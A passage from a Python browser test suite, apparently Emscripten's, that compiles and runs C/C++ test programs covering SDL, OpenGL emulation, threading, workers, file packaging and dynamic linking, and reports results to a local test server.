self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp', 0)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.run_process([EMCC, 'supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', 'supp.wasm', '-s', 'EXPORT_ALL'], assert_returncode=76)
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', test_file('browser', 'cwrap_early.js'), '-s', 'EXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify=0', '-s', 'EXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
self.run_process([EMCC, test_file('browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=_one,_two'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
@parameterized({
'non-lz4': ([],),
'lz4': (['-s', 'LZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'] + args)
def test_mmap_file(self):
create_file('data.dat', 'data from the file ' + ('.' * 9000))
